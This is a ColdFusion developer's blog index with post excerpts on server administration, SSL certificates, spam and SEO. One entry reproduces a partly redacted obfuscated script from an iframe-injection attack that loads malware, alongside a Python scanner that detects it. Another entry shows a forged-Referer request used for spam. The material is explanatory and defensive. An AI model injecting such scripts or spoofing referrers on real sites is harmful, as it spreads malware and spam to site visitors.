ColdFusion Muse

Upload Problem Post-Mortem

We had a ticklish issue arise with a customer recently. We host an application for them that allows them to upload files. As they began to use the application more heavily, they noticed that file uploads above a certain size were failing. The size was fairly modest: uploads between 1 and 4 megs were simply timing out. We eventually came up with a solution, but not before some head scratching. Here is the play-by-play.


New Spam Bot Cracking Captcha Perhaps?

When I arrived at work this morning I found more than 280 spam links posted as comments to various entries on my blog. They were all for certain articles of clothing which shall remain nameless (but some of them are made for walking). Now occasionally, about 3 or 4 times a week, I'll see a single spammy comment posted and I just kill it - case closed. The Captcha keeps out most automated spam, so I figure any spam I get is from individuals paid to laboriously post links. This seemed like more than that - both in volume and in the systematic way it was perpetrated. I will be keeping a close eye on it - but it makes me wonder if there is a bot out there that has cracked my Captcha.

Meanwhile, my sincerest apologies to anyone subscribed to any post of mine who had to suffer through these emails. The Muse will do what he can to make sure it is not a common occurrence.

Certificate Renewal Follies in IIS 7

I have a few Win2008 servers under management and I had to renew a cert for one of them today. Now I confess this is the first time I had to do this particular task so there was some head scratching involved. I learned a number of things that might be of some use to you if you are up against this task. In this case I was renewing a Verisign cert. Here's what I learned.


Iframe Insertion on Index.* Home pages

There's a hack making the rounds that targets pages named "index.*". Actually, it sounds rather like an old hack that is resurfacing. Since many ColdFusion sites use this naming convention for the home page, the attack tends to hit quite a few vulnerable ColdFusion sites. The attack appends a script like this one to the bottom of each "index.*" page:

<sc ript>
var applstrna0 = "<if";
var applstrna1 = "rame src=http://***Domain Host Name****";
var applstrna2 = ".com/bb/faq.htm";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";

Please note that I have not included the actual url of this attack. The domain includes the string "said7". I am only making sure I mention said7 so that folks searching for info on this attack can find this specific post and possibly be helped. I have no wish to benefit the said7 effort and I hope they all get dysentery and spend the weekend in the latrine.

As you can see, the script itself is pretty simple. It writes out an invisible Iframe at the bottom of the page. The target of the Iframe attempts to download a trojan or malware to the user's machine. This attack is insidious and I have yet to discover the origin. But I do know a few things about it - and how to prevent it from continuing. One important thing to note: if you have this problem and Google indexes your site and sees these pages, it will flag your site. Browsers like Firefox use the Google service to throw up a big "malware" warning.

The following article details the attack and the notes I've gathered about it. Some day soon I hope to post a more definitive who, what, when and why post about it. To gather the following notes I'm indebted to the folks on the CF-Talk List (this thread), Nathan, Nick, Jason, Scott, Don and probably a few others I am forgetting. I can't give away too much info here - but please accept my thanks.
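If you suspect you've been hit, a quick scan for that telltale variable name can tell you which pages were tagged. Here's a rough Python sketch - the signature pattern and the idea of scanning only "index.*" files are my assumptions based on the attack described above, so adjust them to what you actually find:

```python
import re
from pathlib import Path

# The obfuscated payload above uses a run of "var applstrnaN = ..."
# assignments - a strong signal that a page has been tampered with.
INJECTION_PATTERN = re.compile(r"var\s+applstrna\d+\s*=", re.IGNORECASE)

def find_infected_pages(webroot):
    """Return the index.* files under webroot whose contents match
    the injection signature."""
    infected = []
    for path in Path(webroot).rglob("index.*"):
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        if INJECTION_PATTERN.search(text):
            infected.append(str(path))
    return infected
```

Run it against a copy of your webroot and diff the hits against your source control before cleaning anything up.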


ColdFusion and SSL 3.0

I've been batting this around for a few days now. Recently, Mary Jo Sminkey of CF Webstore fame posted a note to an email list about a payment gateway's recent requirement that incoming requests to its API use SSL 3.0. I confess to being unaware of the differences between SSL 2.0 and 3.0, so I set out to discover them for myself. To start with, SSL 2.0 uses weaker handshaking: a requesting client can, it seems, edit the list of cipher preferences, leaving the server no choice but to handshake with the "lowest common denominator" cipher. There are some other issues as well dealing with how the packets are constructed. So the consensus is that SSL 2.0 is the weak sister and should be deprecated. For its part, SSL 3.0 has been around for a decade or so and is widely supported.

The question is, will my CFHTTP calls from ColdFusion 6 or ColdFusion 7 still work when the gateway disables SSL 2.0? To answer this question I got some great help from Scott Krebs over at Edge Web. He dug out three or four URLs that were really helpful; I've included them at the bottom of this post. I also got some guidance from the Stephen Hawking of cryptography, Mr. Dean H. Saxe (the H is for Holy Cow he knows a lot). The answer is a qualified yes. Anyway, here's what I did to test while I wait for the gateway to get their act together and set up a test bed.


When Patches Attack

Last night I was sitting at home, using my VPN to dial into one of our servers (a Win2k3 server). I noticed that there were a couple of patches pending installation. Now as a rule I do not run every patch, nor do I ever let Windows "manage" patching for me. Instead, I let Windows download the patches and I choose when and what to install. Still, a couple of these patches were important security fixes (usually a good idea), so I installed them. Now Windows does not always require a reboot after patching, but sometimes it does. Yes, it is one of the annoying things about Windows, so please don't use this post to comment on how much better Linux is than Windows, or cheese, or Santa Claus, or sex, or whatever. Anyway, this time it did ask, and when I chose to restart, things went "a bit wonky," as some of my UK readers might say.


Checking the Size of the Spool Directory on Windows

If you ever send out a few tens of thousands of messages using CF, you know the spool directory can get pretty crowded. If you are like me, you sometimes want to keep an eye on it as those messages clear out to make sure nothing funky is going on. If you use Windows Explorer, this can be a maddening experience. Windows doesn't just retrieve a count of files; it retrieves the entire file list and metadata, and it redraws the Explorer window. When you have 50k messages in the spool folder it can take 10 to 30 seconds just for Windows to refresh the count so you can see how many were added to or deleted from the folder.

Instead, I use a little tool called "t4edirsize" from Tools4Ever. I have a "show spool" batch file on my servers that looks like this:


t4edirsize.exe d:\cfusion8\mail\spool
The output gives me all sorts of information, including the number of files in the directory - but it usually takes only 50-200 milliseconds to run. Tools4Ever command-line tools, along with Sysinternals tools (now owned by Microsoft) like "pslist" and "pskill", are essential to your arsenal as a troubleshooter.
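If you'd rather not install a third-party tool, a few lines of script get you a similarly fast count. Here's a rough Python sketch (the spool path is just the one from my batch file above): it streams directory entries one at a time rather than building the whole listing the way Explorer does.

```python
import os

def spool_count(path):
    """Count the files in a directory without materializing the full
    file list. os.scandir yields entries lazily, so this stays fast
    even with tens of thousands of spooled messages."""
    count = 0
    with os.scandir(path) as entries:
        for entry in entries:
            if entry.is_file():
                count += 1
    return count

# Example: spool_count(r"d:\cfusion8\mail\spool")
```

Run it a few seconds apart and the difference between counts tells you whether the spool is draining or backing up.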

Virtual Sites and "Host Headers" Explained

Some web developers never bother to learn the nitty-gritty stuff that makes up the Internet. I've seen very bright programmers who don't know the difference between a GET request and a POST request (or why they should care). In your journey through the IT landscape it would behoove you to pick up a few tips on how the web actually works. In my view you should know the basics of how a web server and browser work together to deliver content. You should know how to set up a web site in IIS or Apache, and you should know when to use a GET and when to use a POST. It also wouldn't hurt to learn about IP addressing, routing, classless subnets, ARP caching, application pools, JVM garbage collection, the theory of relativity and the meaning of life... but I digress.

Among the items I find myself explaining over and over is the concept of a "Host header" and how it's used on a web server. Like many of my blog posts, this one is intended to help me so I can point to it and not have to repeat myself. To be fair, this topic is one I sometimes have to cover with customers and site owners who need to know the difference between a dedicated IP address and a "virtual site". Either way, here's a rundown of "virtual sites" and "host headers".
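As a quick preview of the idea: the Host header is just one line in the raw request a browser sends. This little Python sketch (the host names are made up) builds that request by hand - the Host line is the only thing that distinguishes two virtual sites sharing one IP address:

```python
def build_request(host, path="/"):
    """Build the raw HTTP/1.1 request a browser would send. The web
    server reads the Host line and routes the request to whichever
    virtual site is configured for that name."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Connection: close\r\n"
        f"\r\n"
    )

# Same IP, same port - the server tells these apart by Host alone:
print(build_request("www.example.com"))
print(build_request("blog.example.com"))
```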


Search Engine Safe URLs and Semantic Parameters

This topic crops up frequently in our line of work. Among the items that are often listed as important to search engines are "search engine safe" (SES) URLs. It has been pointed out that Google will index just about anything - including obscure looking URLs with cryptic parameters on them. Although this is true, we shall see that it does not exempt the developer from paying attention to the URL when he or she is thinking about search engine optimization. Let me explain.
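To make the idea concrete, here's a small Python sketch of the kind of rewrite we're talking about - turning a cryptic query-string URL into a readable, parameter-free path. The URL scheme and slug rules here are purely illustrative, not a prescription:

```python
import re
from urllib.parse import urlparse, parse_qs

def to_ses(url):
    """Rewrite e.g. /article.cfm?id=42&title=My%20Great%20Post into
    /article/42/my-great-post - the parameters become readable path
    segments that both humans and search engines can interpret."""
    parts = urlparse(url)
    qs = parse_qs(parts.query)
    # Page name without its extension becomes the first segment
    page = parts.path.rsplit("/", 1)[-1].split(".")[0]
    # Lowercase the title and collapse anything non-alphanumeric to "-"
    slug = re.sub(r"[^a-z0-9]+", "-", qs["title"][0].lower()).strip("-")
    return f"/{page}/{qs['id'][0]}/{slug}"

print(to_ses("/article.cfm?id=42&title=My%20Great%20Post"))
```

On a real site the mapping runs the other direction too: a rewrite rule or URL filter translates the friendly path back into the query string your CFM template expects.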


Targeting Web Masters: Spamming's New Low

Fighting spam is a lot like those movies where blood sucking zombies just keep coming at you in a never ending supply of non-descript humanoids who want to eat your brain or take out your daughter. I can live with having to keep filters up to date. I know how to use SPF, Spam Assassin and client side filters like spambayes (check it out if you are an outlook user). I can even live with the bots constantly attacking my web forms and trying to hack them to send their own mail. But I think I have stumbled onto a technique that smacks of desperation.

Occasionally I view a stats report for my blog. I use Smarter Stats from "Smarter Tools". It's quite good and it gives me some excellent reporting options (I also love their "Smarter Mail" server). One of the reports I like to view is "referring sites". Mostly I'm just snooping to see if any CF big wigs like Ben Forta, Sean Corfield or Ray Camden have linked to my blog (we keep a bottle of champagne on ice for those occasions). It is interesting to see all of the sites that are listed. All of our CF Webtools blogs are cross-linked, so I see them listed as I would expect. Google, MSN and Yahoo are all represented, as are blog aggregators like fullasagoog and the old Macromedia weblog aggregator, along with some international sites.

All of these I can explain, and I understand how they arrived in my log files. But here are a couple I can't explain. There is a link to a site which I took to be another blog portal; when I went there, it turned out to be a personal loan information site. A closer look turned up sites like "topsecuredloan", "onlineapoker", "insurede" and others less benign. How are these particular referring sites getting into my log files? I have a couple of guesses.

My first guess has to do with email. If you are using a web-based email client like Yahoo and someone sends you an email with a link in it, when you click the link the "referring site" is actually the webmail domain. So perhaps these sites are showing up because someone clicked a link in a web-based email client hosted at one of those domains. I find this explanation unlikely - would anyone really be checking their mail at a domain like that? I suppose if they were using a web host where it was set up that way it could happen.

My second guess is that someone clicked on a Google ad for ColdFusion Muse. I quickly went to my AdWords account and verified that I am not set up to serve Google ads for my blog. We only serve ads for our main web site, CF Webtools.

There may be other explanations, but the best one I can come up with is that this is a new form of spam. It would be trivial to create a bot that issues web requests with a specific referrer. After all, adding your site as a referring site causes your link to show up in reports, and sometimes someone (like myself) will click on it. Of course it would only target folks who are looking at web log reports. Can any Muse readers provide alternate theories? It certainly seems like an act of desperation - or perhaps just too easy to pass up. In any case, I'm off to apply for a 22% loan. Ta-ta.
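Just to show how trivial: here's all the "work" such a bot would have to do. The domains are made up, and nothing is actually sent here - the request object is only constructed, never opened:

```python
import urllib.request

# A referrer-spam bot needs nothing more than a normal request with a
# forged Referer header. The target's stats package dutifully logs the
# fake domain as a "referring site", and a curious webmaster clicks it.
req = urllib.request.Request(
    "http://blog.example.com/",
    headers={"Referer": "http://bestpersonalloan.example/"},
)
print(req.get_header("Referer"))
```

The server has no way to verify the header; the Referer line is whatever the client claims it is, which is exactly why it makes such a cheap spam channel.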

From Server "A" to Server "B" - Details Matter When Re-hosting

You probably know that CF Webtools hosts a fair number of sites in our own burgeoning data center. We are not a commodity host (i.e. Godaddy or HostMySite). Instead, we host a large group of Farcry sites, several dedicated servers, and a large group of very complicated Coldfusion sites with special requirements (data feeds, point to point encryption, data aggregation and third party secure services etc.). Our hosting has grown substantially in the last year and has become an excellent revenue center for us.

One type of project we find ourselves doing with some regularity is a "site re-host". Usually a company has an application that clearly requires more help and attention than can be gained using a commodity host and self-service control panels. Furthermore, such sites have often "evolved" from widgety little intranet-type sites with B2B tools, special custom ecommerce applications or homegrown CMS capabilities into maintenance monsters with hundreds of pages (many of them titled stuff like "order_bak.cfm" or "index.old"). Incidentally, never leave a file like "index.old" on your web site. If the web server is in its default configuration it can serve that file up to a user without running it through the ColdFusion engine. That exposes your code and makes you easier to attack.
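One simple safeguard if you're on IIS 7: request filtering can refuse those leftover extensions outright, so even a forgotten "index.old" never leaves the server. This is just a sketch of the relevant web.config fragment - the extension list is my assumption, so add whatever suffixes your team actually leaves behind:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <security>
      <requestFiltering>
        <fileExtensions>
          <!-- Refuse to serve leftover source copies outright -->
          <add fileExtension=".old" allowed="false" />
          <add fileExtension=".bak" allowed="false" />
        </fileExtensions>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
```

The real fix, of course, is not to leave those files in the webroot at all - but a filter like this catches the ones that slip through.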

In any case, re-hosting a site seems like a simple enterprise. If your site consists of a database and codebase, then it can be simple - but the devil is in the details (and in the cat, as my Dad used to say). Here is a rundown that you might find useful.


Search Engines Series Pt. 2.b - Links, Content and Format

In this post, part 2 "b" in our search engine series, we will discuss how the content and structure of your page might influence how your site is viewed by search engines. In part 1 we talked about having useful and valuable content. That lesson is the foundation on which all other legitimate techniques must be based. If your content is not useful you are part of the problem we are trying to solve. In Part 2 "a" we talked about stuff that goes into the header. Now it's time to talk about things that go into the actual page.


Search Engines Series Pt. 2 - Coding The Header

In this post, part 2 in our search engine series, we will discuss important aspects of coding and designing that will facilitate easier indexing by search engines and create a higher likelihood of a rising page rank. In Part 1 of this series we discussed the concept that your web site needs valuable and fresh content to really be useful to search engines. Without useful content your web site will not be a destination that anyone wants to visit, and therefore it will not be something that search engines (who are customer focused) want to index. Keep part 1 in mind as we discuss what you can do with your code and with your pages. Unless you have solved the puzzle of maintaining fresh and valuable content on your web site, you will be spinning your wheels.

Of course, you can use certain techniques to get yourself ranked high - at least temporarily. But my guess is that you will spend just as much time changing your code in a running battle to keep yourself on top of Google as you would if you learned to write and maintain good information on your site. By the way, those "black-hat techniques" are not discussed in this post. This post is about preparing your valuable content to be consumed by a search engine that wants and needs it - not about tricking a search engine into indexing less than worthy content. With that in mind....
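As a taste of what follows: the two header items that matter most are still the humble title and meta description. A minimal illustration (the content here is made up for this blog - write yours per page, not per site):

```html
<head>
  <!-- A unique, descriptive title is the most visible line in a
       search result. One per page, not one boilerplate per site. -->
  <title>Checking the Spool Directory Size - ColdFusion Muse</title>

  <!-- The description often becomes the snippet under the link.
       Summarize this page's content, not your whole company. -->
  <meta name="description"
        content="A fast command-line alternative to Windows Explorer for watching the ColdFusion mail spool directory." />
</head>
```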


Search Engines Series Pt. 1 - Content is King

Practically every day a customer of ours will ask us about search engine optimization (SEO). It usually starts with something like, "What can I do to get ranked higher on search engines?" or "Why doesn't my site show up on Google?" or maybe "How do I use this newfangled contraption called a mouse?" I usually begin by patiently explaining that SEO is kind of an art - a dance between developer coding techniques, business strategies, content and the search engine. It's a boxing match where everyone has a part to play and the ground is always shifting. I go on from dancing and boxing to several other metaphors involving movement and competition (and one involving cheese). Then I recommend a few changes. At this point the customer usually says something like, "...and that will get me on the first page of search engines, right?" To answer, I usually tell the joke about MTV asking Bob Dole the same question they asked Clinton: "Do you wear boxers or briefs?" Seventy-year-old Dole responded, "Depends."

(Series: click here for Part 2 - The Header )


Verisign and Kafka - Separated at Birth?

So you want an SSL certificate and your customer insists on using Verisign, eh? Here's something to watch out for: the "domain registrant". In case you needed another indicator that the whole SSL "authority" game is a protection racket, let me fill you in on my tale of woe. I have a customer who insisted on using Verisign for his SSL certificate. I dutifully went to Verisign, purchased the overpriced product and waited for my new cert to arrive. Shortly after the purchase I got a note from Verisign support. My customer, in his wisdom, had made the domain registration private. Because a WHOIS query identified the domain as private, Verisign couldn't verify that my customer "owned" the domain. Our first step was to make the information public. That turned out to be only the beginning of our trouble.


More Entries

Blog provided and hosted by CF Webtools. Blog Software by Ray Camden.